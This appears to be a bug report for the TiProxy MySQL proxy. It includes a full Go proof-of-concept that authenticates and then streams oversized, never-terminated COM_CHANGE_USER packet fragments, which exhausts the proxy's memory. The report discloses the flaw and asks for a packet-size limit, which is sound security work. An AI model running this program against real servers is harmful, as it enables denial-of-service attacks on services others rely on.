Please answer these questions before submitting your issue. Thanks!
TiProxy should enforce a bounded logical packet size and close the connection with a packet-too-large error.
// Copyright 2026 PingCAP, Inc.
// SPDX-License-Identifier: Apache-2.0
package main
import (
"crypto/sha1"
"encoding/binary"
"errors"
"flag"
"fmt"
"io"
"net"
"os"
"strings"
"time"
)
const (
maxPayloadLen = 1<<24 - 1
comChangeUser = 0x11
clientLongPassword uint32 = 1 << 0
clientLongFlag uint32 = 1 << 2
clientConnectWithDB uint32 = 1 << 3
clientProtocol41 uint32 = 1 << 9
clientTransactions uint32 = 1 << 13
clientSecureConnection uint32 = 1 << 15
clientMultiResults uint32 = 1 << 17
clientPluginAuth uint32 = 1 << 19
okHeader = 0x00
errHeader = 0xff
authSwitchHeader = 0xfe
)
type handshakeInfo struct {
salt []byte
authPlugin string
}
func main() {
if err := run(); err != nil {
fmt.Fprintln(os.Stderr, "error:", err)
os.Exit(1)
}
}
func run() error {
addr := flag.String("addr", "127.0.0.1:6000", "TiProxy SQL address")
user := flag.String("user", "root", "MySQL user")
password := flag.String("password", "", "MySQL password")
db := flag.String("db", "", "default database")
fragments := flag.Int("fragments", 2, "number of 0xffffff-byte physical fragments to send")
chunkSize := flag.Int("chunk-size", 256*1024, "zero-fill write chunk size")
dialTimeout := flag.Duration("dial-timeout", 5*time.Second, "TCP dial timeout")
ioTimeout := flag.Duration("io-timeout", 30*time.Second, "authentication and write timeout")
linger := flag.Duration("linger", 30*time.Second, "time to keep the connection open after sending fragments")
flag.Parse()
if *fragments <= 0 {
return errors.New("--fragments must be greater than 0")
}
if *chunkSize <= 0 || *chunkSize > maxPayloadLen {
return fmt.Errorf("--chunk-size must be in range [1, %d]", maxPayloadLen)
}
conn, err := net.DialTimeout("tcp", *addr, *dialTimeout)
if err != nil {
return fmt.Errorf("dial %s: %w", *addr, err)
}
defer conn.Close()
if err := conn.SetDeadline(time.Now().Add(*ioTimeout)); err != nil {
return fmt.Errorf("set auth deadline: %w", err)
}
if err := authenticate(conn, *user, *password, *db); err != nil {
return err
}
estimated := uint64(*fragments) * maxPayloadLen
fmt.Printf("authenticated; sending %d max fragments, logical bytes without terminator: %d\n", *fragments, estimated)
if err := conn.SetDeadline(time.Now().Add(*ioTimeout)); err != nil {
return fmt.Errorf("set write deadline: %w", err)
}
if err := writeChangeUserFragments(conn, *fragments, *chunkSize); err != nil {
return err
}
if err := conn.SetDeadline(time.Time{}); err != nil {
return fmt.Errorf("clear deadline: %w", err)
}
fmt.Printf("sent %d fragments; no short terminating fragment will be sent; lingering for %s\n", *fragments, *linger)
time.Sleep(*linger)
return nil
}
func authenticate(conn net.Conn, user, password, db string) error {
initial, seq, err := readPacket(conn)
if err != nil {
return fmt.Errorf("read initial handshake: %w", err)
}
if seq != 0 {
fmt.Fprintf(os.Stderr, "warning: initial handshake sequence is %d, expected 0\n", seq)
}
hs, err := parseInitialHandshake(initial)
if err != nil {
return err
}
if hs.authPlugin == "" {
hs.authPlugin = "mysql_native_password"
}
if hs.authPlugin != "mysql_native_password" {
return fmt.Errorf("unsupported initial auth plugin %q; this repro supports mysql_native_password", hs.authPlugin)
}
resp := makeHandshakeResponse(user, password, db, hs.salt, hs.authPlugin)
if err := writePacket(conn, resp, 1); err != nil {
return fmt.Errorf("write handshake response: %w", err)
}
for {
pkt, serverSeq, err := readPacket(conn)
if err != nil {
return fmt.Errorf("read auth response: %w", err)
}
if len(pkt) == 0 {
return errors.New("empty auth response")
}
switch pkt[0] {
case okHeader:
return nil
case errHeader:
return mysqlErr(pkt)
case authSwitchHeader:
plugin, salt, err := parseAuthSwitch(pkt)
if err != nil {
return err
}
if plugin != "mysql_native_password" {
return fmt.Errorf("unsupported auth switch plugin %q", plugin)
}
token := nativePasswordToken(password, salt)
if err := writePacket(conn, token, serverSeq+1); err != nil {
return fmt.Errorf("write auth switch response: %w", err)
}
default:
return fmt.Errorf("unexpected auth response header 0x%02x", pkt[0])
}
}
}
func parseInitialHandshake(data []byte) (*handshakeInfo, error) {
if len(data) < 34 {
return nil, fmt.Errorf("initial handshake too short: %d bytes", len(data))
}
pos := 0
pos++ // protocol version
end := indexByte(data[pos:], 0)
if end < 0 {
return nil, errors.New("initial handshake missing server-version terminator")
}
pos += end + 1
pos += 4 // connection ID
salt := append([]byte(nil), data[pos:pos+8]...)
pos += 8
pos++ // filler
if len(data) < pos+2 {
return &handshakeInfo{salt: salt}, nil
}
lowerCaps := binary.LittleEndian.Uint16(data[pos : pos+2])
pos += 2
if len(data) <= pos {
return &handshakeInfo{salt: salt}, nil
}
pos++ // collation
pos += 2
if len(data) < pos+2 {
return &handshakeInfo{salt: salt}, nil
}
upperCaps := binary.LittleEndian.Uint16(data[pos : pos+2])
pos += 2
capability := uint32(lowerCaps) | uint32(upperCaps)<<16
authDataLen := 0
if len(data) > pos {
authDataLen = int(data[pos])
}
pos++
pos += 10
if len(data) < pos {
return &handshakeInfo{salt: salt}, nil
}
part2Len := 13
if authDataLen > 8 {
part2Len = authDataLen - 8
if part2Len < 13 {
part2Len = 13
}
}
if len(data) > pos {
end := pos + part2Len
if end > len(data) {
end = len(data)
}
part2 := data[pos:end]
if nul := indexByte(part2, 0); nul >= 0 {
part2 = part2[:nul]
}
salt = append(salt, part2...)
pos = end
}
plugin := ""
if capability&clientPluginAuth != 0 && len(data) > pos {
if nul := indexByte(data[pos:], 0); nul >= 0 {
plugin = string(data[pos : pos+nul])
}
}
return &handshakeInfo{salt: salt, authPlugin: plugin}, nil
}
func makeHandshakeResponse(user, password, db string, salt []byte, plugin string) []byte {
capability := clientLongPassword | clientLongFlag | clientProtocol41 |
clientTransactions | clientSecureConnection | clientMultiResults | clientPluginAuth
if db != "" {
capability |= clientConnectWithDB
}
token := nativePasswordToken(password, salt)
data := make([]byte, 0, 64+len(user)+len(db)+len(plugin)+len(token))
data = appendUint32(data, capability)
data = appendUint32(data, 0)
data = append(data, 45)
data = append(data, make([]byte, 23)...)
data = append(data, user...)
data = append(data, 0)
data = append(data, byte(len(token)))
data = append(data, token...)
if db != "" {
data = append(data, db...)
data = append(data, 0)
}
data = append(data, plugin...)
data = append(data, 0)
return data
}
func parseAuthSwitch(pkt []byte) (string, []byte, error) {
if len(pkt) < 2 || pkt[0] != authSwitchHeader {
return "", nil, errors.New("malformed auth switch request")
}
rest := pkt[1:]
nul := indexByte(rest, 0)
if nul < 0 {
return "", nil, errors.New("auth switch request missing plugin terminator")
}
plugin := string(rest[:nul])
salt := rest[nul+1:]
if len(salt) > 0 && salt[len(salt)-1] == 0 {
salt = salt[:len(salt)-1]
}
return plugin, salt, nil
}
func nativePasswordToken(password string, salt []byte) []byte {
if password == "" {
return nil
}
stage1 := sha1.Sum([]byte(password))
stage2 := sha1.Sum(stage1[:])
h := sha1.New()
h.Write(salt)
h.Write(stage2[:])
stage3 := h.Sum(nil)
token := make([]byte, len(stage1))
for i := range stage1 {
token[i] = stage1[i] ^ stage3[i]
}
return token
}
func writeChangeUserFragments(conn net.Conn, fragments, chunkSize int) error {
zeros := make([]byte, chunkSize)
for i := 0; i < fragments; i++ {
seq := byte(i)
header := []byte{0xff, 0xff, 0xff, seq}
if err := writeFull(conn, header); err != nil {
return fmt.Errorf("write fragment %d header: %w", i, err)
}
remaining := maxPayloadLen
if i == 0 {
if err := writeFull(conn, []byte{comChangeUser}); err != nil {
return fmt.Errorf("write COM_CHANGE_USER byte: %w", err)
}
remaining--
}
for remaining > 0 {
n := remaining
if n > len(zeros) {
n = len(zeros)
}
if err := writeFull(conn, zeros[:n]); err != nil {
return fmt.Errorf("write fragment %d payload: %w", i, err)
}
remaining -= n
}
fmt.Printf("sent max fragment %d/%d\n", i+1, fragments)
}
return nil
}
func readPacket(r io.Reader) ([]byte, byte, error) {
var out []byte
var firstSeq byte
for {
var hdr [4]byte
if _, err := io.ReadFull(r, hdr[:]); err != nil {
return nil, 0, err
}
length := int(hdr[0]) | int(hdr[1])<<8 | int(hdr[2])<<16
if out == nil {
firstSeq = hdr[3]
}
payload := make([]byte, length)
if _, err := io.ReadFull(r, payload); err != nil {
return nil, 0, err
}
out = append(out, payload...)
if length < maxPayloadLen {
return out, firstSeq, nil
}
}
}
func writePacket(w io.Writer, payload []byte, seq byte) error {
if len(payload) > maxPayloadLen {
return fmt.Errorf("packet too large for simple writer: %d bytes", len(payload))
}
header := []byte{byte(len(payload)), byte(len(payload) >> 8), byte(len(payload) >> 16), seq}
if err := writeFull(w, header); err != nil {
return err
}
return writeFull(w, payload)
}
func writeFull(w io.Writer, data []byte) error {
for len(data) > 0 {
n, err := w.Write(data)
if err != nil {
return err
}
if n == 0 {
return io.ErrShortWrite
}
data = data[n:]
}
return nil
}
func mysqlErr(pkt []byte) error {
if len(pkt) < 3 {
return fmt.Errorf("mysql error packet too short: %x", pkt)
}
code := binary.LittleEndian.Uint16(pkt[1:3])
msg := strings.TrimRight(string(pkt[3:]), "\x00")
return fmt.Errorf("mysql error %d: %s", code, msg)
}
func appendUint32(dst []byte, v uint32) []byte {
var buf [4]byte
binary.LittleEndian.PutUint32(buf[:], v)
return append(dst, buf[:]...)
}
func indexByte(data []byte, b byte) int {
for i, v := range data {
if v == b {
return i
}
}
return -1
}
Bug Report
Please answer these questions before submitting your issue. Thanks!
1. Minimal reproduce step (Required)
COM_CHANGE_USERpacket whose first physical fragment is0xffffffbytes.0xffffff-byte fragments without a shorter terminating fragment.2. What did you expect to see? (Required)
TiProxy should enforce a bounded logical packet size and close the connection with a packet-too-large error.
3. What did you see instead (Required)
COM_CHANGE_USERis exempted from streaming and is read withReadPacket, which appends every maximum-size fragment without an accumulated-size limit. One authenticated connection can exhaust process memory.4. What is your version? (Required)
51859ee68000dd14dbff4dcaf0ffaeb349d1d5betiproxy versionoutput when reproducing.The following program can be used to reproduce this issue: